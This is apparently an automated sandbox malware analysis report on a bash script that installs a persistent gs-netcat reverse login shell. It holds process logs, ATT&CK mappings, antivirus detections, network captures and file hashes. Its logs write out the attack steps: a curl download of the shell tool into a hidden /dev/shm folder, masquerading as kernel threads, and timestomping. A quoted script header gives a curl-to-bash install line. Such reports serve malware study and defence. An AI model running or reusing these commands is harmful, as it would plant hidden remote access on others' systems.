Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/121/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1349/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1349/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/122/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/122/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/243/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/243/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/123/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/123/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/2/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/2/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/124/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/124/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/3/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/3/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/4/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/4/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/125/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/125/cmdlineJump to behavior
Source: /usr/bin/bash (PID: 6291)Shell command executed: /bin/bash -c "echo TRUE"Jump to behavior
Source: /usr/bin/bash (PID: 6303)Chmod executable: /usr/bin/chmod -> chmod 700 /dev/shm/.gs-0Jump to behavior
Source: /usr/bin/bash (PID: 6318)Chmod executable: /usr/bin/chmod -> chmod 600 /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6346)Chmod executable: /usr/bin/chmod -> chmod 600 /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6350)Chmod executable: /usr/bin/chmod -> chmod 700 /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6337)Curl executable: /usr/bin/curl -> curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64Jump to behavior
Source: /usr/bin/bash (PID: 6302)Mkdir executable: /usr/bin/mkdir -> mkdir /dev/shm/.gs-0Jump to behavior
Source: /usr/bin/bash (PID: 6287)Pgrep executable: /usr/bin/pgrep -> pgrep defunctJump to behavior
Source: /usr/bin/bash (PID: 6289)Pgrep executable: /usr/bin/pgrep -> pgrep (\\[kstrp\\]|\\[watchdogd\\]|\\[ksmd\\]|\\[kswapd0\\]|\\[card0\\-crtc8\\]|\\[mm\\_percpu\\_wq\\]|\\[rcu\\_preempt\\]|\\[kworker\\]|\\[raid5wq\\]|\\[slub\\_flushwq\\]|\\[netns\\]|\\[kaluad\\])Jump to behavior
Source: /usr/bin/bash (PID: 6306)Rm executable: /usr/bin/rm -> rm -f /dev/shm/.gs-0/.gs-rw.lockJump to behavior
Source: /usr/bin/bash (PID: 6343)Rm executable: /usr/bin/rm -> rm -f /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6349)Rm executable: /usr/bin/rm -> rm -f /dev/shm/.gs-0/gs-netcatJump to behavior
Source: /usr/bin/bash (PID: 6354)Rm executable: /usr/bin/rm -> rm -rf /dev/shm/.gs-0/*Jump to behavior
Source: /usr/bin/bash (PID: 6305)Touch executable: /usr/bin/touch -> touch /dev/shm/.gs-0/.gs-rw.lockJump to behavior
Source: /usr/bin/bash (PID: 6317)Touch executable: /usr/bin/touch -> touch /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6345)Touch executable: /usr/bin/touch -> touch /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6356)Touch executable: /usr/bin/touch -> touch -t 202410010411.39 /dev/shmJump to behavior
Source: /usr/bin/bash (PID: 6357)Touch executable: /usr/bin/touch -> touch -t 202109170423.51 /usr/binJump to behavior
Source: /usr/bin/bash (PID: 6358)Touch executable: /usr/bin/touch -> touch -t 200611251713.29 /usr/bin/defunctJump to behavior
Source: /usr/bin/chmod (PID: 6303)File: /dev/shm/.gs-0 (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /usr/bin/chmod (PID: 6350)File: /usr/bin/defunct (bits: - usr: - grp: - all: rwx)Jump to behavior
Source: /usr/bin/curl (PID: 6337)File written: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64Jump to dropped file
Source: /usr/bin/cp (PID: 6347)File written: /usr/bin/defunctJump to dropped file
Source: /usr/bin/bash (PID: 6241)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6244)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6247)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6250)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6253)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6256)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6259)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6262)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6265)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6268)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6271)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6274)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior
Source: /usr/bin/bash (PID: 6285)Sed executable: /usr/bin/sed -> sed s/[^a-zA-Z0-9]/\\\\&/gJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /usr/bin/cp (PID: 6347)File: /usr/bin/defunctJump to dropped file
Source: /usr/bin/rm (PID: 6343)File: /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6280)Base64 executable: /usr/bin/base64 -> base64 -w0Jump to behavior
Source: /usr/bin/bash (PID: 6281)Base64 executable: /usr/bin/base64 -> base64 -dJump to behavior
Source: /usr/bin/bash (PID: 6327)Base64 executable: /usr/bin/base64 -> base64 -w0Jump to behavior
Source: /usr/bin/bash (PID: 6331)Base64 executable: /usr/bin/base64 -> base64 -w0Jump to behavior
Source: /usr/bin/bash (PID: 6335)Base64 executable: /usr/bin/base64 -> base64 -w0Jump to behavior
Source: /usr/bin/pgrep (PID: 6287)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6289)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/bash (PID: 6238)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/uname (PID: 6277)Queries kernel information via 'uname': Jump to behavior
Source: /bin/bash (PID: 6291)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/curl (PID: 6337)Queries kernel information via 'uname': Jump to behavior
Source: /usr/bin/bash (PID: 6277)Uname executable: /usr/bin/uname -> uname -mJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Command and Scripting Interpreter
2
Scripting
Path Interception1
Masquerading
1
OS Credential Dumping
1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
1
Exfiltration Over Alternative Protocol
Abuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Hide Artifacts
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
File and Directory Permissions Modification
Security Account Manager2
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Hidden Files and Directories
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Timestomp
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Indicator Removal
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
File Deletion
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523256 Sample: y Startdate: 01/10/2024 Architecture: LINUX Score: 76 49 c.gs.thc.org 45.14.164.3, 40962, 443 VALCANALE-NETIT Germany 2->49 51 cdn.gsocket.io 92.60.39.208, 38076, 443 NETCUP-ASnetcupGmbHDE Germany 2->51 53 3 other IPs or domains 2->53 55 Antivirus detection for dropped file 2->55 57 Multi AV Scanner detection for submitted file 2->57 9 bash 2->9         started        signatures3 process4 process5 11 bash 9->11         started        13 bash cp 9->13         started        17 bash rm 9->17         started        19 61 other processes 9->19 file6 21 bash curl 11->21         started        47 /usr/bin/defunct, ELF 13->47 dropped 63 Writes identical ELF files to multiple locations 13->63 65 Drops files in suspicious directories 13->65 67 Sample deletes itself 17->67 69 Explicitly modifies time stamps using the "touch" command 19->69 25 bash 19->25         started        27 bash 19->27         started        29 bash 19->29         started        31 41 other processes 19->31 signatures7 process8 file9 45 /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64, ELF 21->45 dropped 59 Writes ELF files to hidden directories 21->59 61 Writes identical ELF files to multiple locations 21->61 33 bash base64 25->33         started        35 bash 25->35         started        37 bash base64 27->37         started        39 bash 27->39         started        41 bash base64 29->41         started        43 bash 29->43         started        signatures10 process11
SourceDetectionScannerLabelLink
y42%ReversingLabsLinux.Trojan.Multiverze
y40%VirustotalBrowse
SourceDetectionScannerLabelLink
/dev/shm/.gs-0/gs-netcat_mini-linux-x86_64100%AviraLINUX/AVI.Agent.wrdff
/usr/bin/defunct100%AviraLINUX/AVI.Agent.wrdff
/dev/shm/.gs-0/gs-netcat_mini-linux-x86_6454%ReversingLabsLinux.Hacktool.GsNetcat
/dev/shm/.gs-0/gs-netcat_mini-linux-x86_6452%VirustotalBrowse
/usr/bin/defunct54%ReversingLabsLinux.Hacktool.GsNetcat
/usr/bin/defunct52%VirustotalBrowse
SourceDetectionScannerLabelLink
cdn.gsocket.io5%VirustotalBrowse
c.gs.thc.org0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://cdn.gsocket.io4%VirustotalBrowse
https://gsocket.io4%VirustotalBrowse
https://webhook.site/$0%VirustotalBrowse
https://webhook.site0%VirustotalBrowse
https://discord.com/api/webhooks/$0%VirustotalBrowse
https://www.gsocket.io/deploy/2%VirustotalBrowse
https://github.com/hackerschoice/gsocket-relay0%VirustotalBrowse
https://github.com/hackerschoice/gsocket/releases$0%VirustotalBrowse
https://gsocket.io/x)4%VirustotalBrowse
https://api.telegram.org/bot$1%VirustotalBrowse
https://t.me/thcorg$2%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
cdn.gsocket.io
92.60.39.208
truefalseunknown
c.gs.thc.org
45.14.164.3
truefalseunknown
NameMaliciousAntivirus DetectionReputation
https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64true
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://foo.blah/log.php?s=yfalse
      unknown
      https://www.gsocket.io/deploy/ytrueunknown
      https://cdn.gsocket.ioytrueunknown
      https://gsocket.ioyfalseunknown
      https://t.me/thcorg$yfalseunknown
      https://webhook.siteyfalseunknown
      https://github.com/hackerschoice/gsocket-relayytrueunknown
      https://github.com/hackerschoice/gsocket/releases$yfalseunknown
      https://webhook.site/$yfalseunknown
      https://api.telegram.org/bot$yfalseunknown
      https://discord.com/api/webhooks/$yfalseunknown
      https://gsocket.io/x)yfalseunknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      92.60.39.208
      cdn.gsocket.ioGermany
      197540NETCUP-ASnetcupGmbHDEfalse
      109.202.202.202
      unknownSwitzerland
      13030INIT7CHfalse
      45.14.164.3
      c.gs.thc.orgGermany
      209987VALCANALE-NETITfalse
      91.189.91.43
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      91.189.91.42
      unknownUnited Kingdom
      41231CANONICAL-ASGBfalse
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
      • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
      91.189.91.43SecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
        x86_32.nn.elfGet hashmaliciousOkiruBrowse
          x86_64.nn.elfGet hashmaliciousOkiruBrowse
            arm.nn.elfGet hashmaliciousOkiruBrowse
              arm6.nn.elfGet hashmaliciousOkiruBrowse
                hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                  hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                    cron.elfGet hashmaliciousUnknownBrowse
                      84.elfGet hashmaliciousUnknownBrowse
                        SecuriteInfo.com.Linux.Siggen.9999.13181.28360.elfGet hashmaliciousMiraiBrowse
                          91.189.91.42SecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
                            x86_32.nn.elfGet hashmaliciousOkiruBrowse
                              x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                arm.nn.elfGet hashmaliciousOkiruBrowse
                                  arm6.nn.elfGet hashmaliciousOkiruBrowse
                                    hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                      hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                        cron.elfGet hashmaliciousUnknownBrowse
                                          84.elfGet hashmaliciousUnknownBrowse
                                            SecuriteInfo.com.Linux.Siggen.9999.13181.28360.elfGet hashmaliciousMiraiBrowse
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              NETCUP-ASnetcupGmbHDEACUN4Da4d7.exeGet hashmaliciousUnknownBrowse
                                              • 185.163.116.177
                                              bot_library.exeGet hashmaliciousUnknownBrowse
                                              • 37.221.195.103
                                              RFQ_0020829024SEPT.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 45.83.105.92
                                              August Shipment - Inv No. 041.xlsGet hashmaliciousUnknownBrowse
                                              • 45.83.105.92
                                              August Shipment - Inv No. 041.xlsGet hashmaliciousUnknownBrowse
                                              • 45.83.105.92
                                              August Shipment - Inv No. 041.xlsGet hashmaliciousUnknownBrowse
                                              • 45.83.105.92
                                              August Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                              • 45.83.105.92
                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 45.83.105.92
                                              RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • 45.83.105.92
                                              CANONICAL-ASGBSecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                              • 91.189.91.42
                                              x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                              • 91.189.91.42
                                              arm.nn.elfGet hashmaliciousOkiruBrowse
                                              • 91.189.91.42
                                              arm6.nn.elfGet hashmaliciousOkiruBrowse
                                              • 91.189.91.42
                                              hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 91.189.91.42
                                              hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 91.189.91.42
                                              cayo.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.125.190.26
                                              cron.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              84.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              CANONICAL-ASGBSecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                              • 91.189.91.42
                                              x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                              • 91.189.91.42
                                              arm.nn.elfGet hashmaliciousOkiruBrowse
                                              • 91.189.91.42
                                              arm6.nn.elfGet hashmaliciousOkiruBrowse
                                              • 91.189.91.42
                                              hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 91.189.91.42
                                              hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 91.189.91.42
                                              cayo.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 185.125.190.26
                                              cron.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              84.elfGet hashmaliciousUnknownBrowse
                                              • 91.189.91.42
                                              VALCANALE-NETITSecuriteInfo.com.ELF.Mirai-CTV.31115.21396.elfGet hashmaliciousUnknownBrowse
                                              • 45.14.165.159
                                              New-Order#0328023.exeGet hashmaliciousNanocoreBrowse
                                              • 45.14.165.113
                                              1x3IHc9N4r.exeGet hashmaliciousBlackshades, Quasar, zgRATBrowse
                                              • 45.14.165.143
                                              confirmation copy_swift.xlsGet hashmaliciousFormBook, zgRATBrowse
                                              • 45.14.165.143
                                              file.exeGet hashmaliciousFormBook, zgRATBrowse
                                              • 45.14.165.143
                                              SecuriteInfo.com.Variant.MSILHeracles.60685.21905.32306.exeGet hashmaliciousFormBook, zgRATBrowse
                                              • 45.14.165.143
                                              file.exeGet hashmaliciousFormBook, zgRATBrowse
                                              • 45.14.165.143
                                              SecuriteInfo.com.Variant.Tedy.277312.5604.3724.exeGet hashmaliciousFormBook, zgRATBrowse
                                              • 45.14.165.143
                                              January_order_2003984.xlsGet hashmaliciousFormBook, zgRATBrowse
                                              • 45.14.165.143
                                              SecuriteInfo.com.Win32.DropperX-gen.14564.4830.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                              • 45.14.165.143
                                              INIT7CHSecuriteInfo.com.Linux.Siggen.9999.18122.21320.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              x86_32.nn.elfGet hashmaliciousOkiruBrowse
                                              • 109.202.202.202
                                              x86_64.nn.elfGet hashmaliciousOkiruBrowse
                                              • 109.202.202.202
                                              arm.nn.elfGet hashmaliciousOkiruBrowse
                                              • 109.202.202.202
                                              arm6.nn.elfGet hashmaliciousOkiruBrowse
                                              • 109.202.202.202
                                              hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 109.202.202.202
                                              hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 109.202.202.202
                                              cron.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              84.elfGet hashmaliciousUnknownBrowse
                                              • 109.202.202.202
                                              SecuriteInfo.com.Linux.Siggen.9999.13181.28360.elfGet hashmaliciousMiraiBrowse
                                              • 109.202.202.202
                                              No context
                                              No context
                                              Process:/usr/bin/curl
                                              File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped
                                              Category:dropped
                                              Size (bytes):2833840
                                              Entropy (8bit):6.080429621428719
                                              Encrypted:false
                                              SSDEEP:49152:T0idKbBedbWCCQZLyOgk/KszcixmYw2Y30scw+G2oT+uoNNyZlrhcSueVu7VwTCI:T0PbiWCPyOgk/pzcixmf2sp2pu/Zlr+L
                                              MD5:D75CB9920D1D3D280518DDCCFE4789D2
                                              SHA1:18821DBB53892D6FAA14B1F063517A0302057290
                                              SHA-256:D94F75A70B5CABAF786AC57177ED841732E62BDCC9A29E06E5B41D9BE567BCFA
                                              SHA-512:E1BA472FE8B973C87B8AD689AB6F1897999CEF38752D0F34C63104E78F14F0544531787BE4501CC3CFF8857262060002F49214E23AFC81FE5A722752E3449DC7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 54%
                                              • Antivirus: Virustotal, Detection: 52%, Browse
                                              Reputation:low
                                              Preview:.ELF..............>......<......@.......p7+.........@.8...@.......................................'.......'....... .............p.'.....p.G.....p.G......T......0v........ ...............*.......J.......J.............................................................0.......0...............S.td............................0.......0...............P.td......".......".......".....<.......<...............Q.td....................................................R.td....p.'.....p.G.....p.G................................. .......GNU.................................................................................................................p.G............. ?......x.G..............>........G.......................G.......................G.......................G.......................G.............w.......8.G.............k.........G.............{.........G.....................(.G.....................x.G.......................G..............#........G.....................h.G.....................
                                              Process:/usr/bin/cp
                                              File Type:ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped
                                              Category:dropped
                                              Size (bytes):2833840
                                              Entropy (8bit):6.080429621428719
                                              Encrypted:false
                                              SSDEEP:49152:T0idKbBedbWCCQZLyOgk/KszcixmYw2Y30scw+G2oT+uoNNyZlrhcSueVu7VwTCI:T0PbiWCPyOgk/pzcixmf2sp2pu/Zlr+L
                                              MD5:D75CB9920D1D3D280518DDCCFE4789D2
                                              SHA1:18821DBB53892D6FAA14B1F063517A0302057290
                                              SHA-256:D94F75A70B5CABAF786AC57177ED841732E62BDCC9A29E06E5B41D9BE567BCFA
                                              SHA-512:E1BA472FE8B973C87B8AD689AB6F1897999CEF38752D0F34C63104E78F14F0544531787BE4501CC3CFF8857262060002F49214E23AFC81FE5A722752E3449DC7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 54%
                                              • Antivirus: Virustotal, Detection: 52%, Browse
                                              Reputation:low
                                              Preview:.ELF..............>......<......@.......p7+.........@.8...@.......................................'.......'....... .............p.'.....p.G.....p.G......T......0v........ ...............*.......J.......J.............................................................0.......0...............S.td............................0.......0...............P.td......".......".......".....<.......<...............Q.td....................................................R.td....p.'.....p.G.....p.G................................. .......GNU.................................................................................................................p.G............. ?......x.G..............>........G.......................G.......................G.......................G.......................G.............w.......8.G.............k.........G.............{.........G.....................(.G.....................x.G.......................G..............#........G.....................h.G.....................
                                              File type:Bourne-Again shell script, ASCII text executable
                                              Entropy (8bit):5.683859150557189
                                              TrID:
                                                File name:y
                                                File size:48'472 bytes
                                                MD5:b4ae01a2cca1052689c00d8ff4e94524
                                                SHA1:9d8b20bb6bb0471c16dfe8ccadc0a9441bd986ce
                                                SHA256:9cc787ca0b6e698b62f6e8ca5da6f2183a350acda9098b4194aa1894dcd39690
                                                SHA512:a7f79c43ba91d04c9f0d4818fcb39cab8b7853df7c134c02a5902d69742097297bd985e8cc0173e189dc3c09a16e09a9d23978dc7acebcd29f0932d34b3a1c66
                                                SSDEEP:768:i991WHuydzUKO8EorVMuMN0NBF7SsA6cYtNGTiPax+dFVcglW:4MHuYUKV9x7aahW
                                                TLSH:97235C62F98376B03F5142799F91A4667F5BDC3B4E682B41F0866D1CA1346BCB0B24D3
                                                File Content Preview:#! /usr/bin/env bash..# Install and start a permanent gs-netcat reverse login shell.#.# See https://www.gsocket.io/deploy/ for examples..#.# This script is typically invoked like this as root or non-root user:.# $ bash -c "$(curl -fsSL https://gsocket.i
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 1, 2024 11:11:58.624192953 CEST43928443192.168.2.2391.189.91.42
                                                Oct 1, 2024 11:12:01.773292065 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:01.773329020 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:01.773380995 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:01.834877014 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:01.834892035 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.485197067 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.485358000 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.487848043 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.487859964 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.489801884 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.489866018 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.504344940 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.504501104 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.504544973 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.504550934 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.504590034 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.506156921 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.551405907 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.872977972 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.873004913 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.873061895 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.873172998 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.873172998 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.873172998 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.873198032 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.873245955 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.874639988 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.874663115 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.874687910 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.874692917 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.874703884 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.874728918 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.964865923 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.964910030 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.964997053 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.964997053 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.965015888 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.965061903 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.966017008 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.966042995 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.966068983 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.966073036 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.966083050 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.966108084 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.967915058 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.967969894 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.967974901 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.968005896 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.968019962 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.968048096 CEST38076443192.168.2.2392.60.39.208
                                                Oct 1, 2024 11:12:02.969026089 CEST4433807692.60.39.208192.168.2.23
                                                Oct 1, 2024 11:12:02.969070911 CEST4433807692.60.39.208192.168.2.23
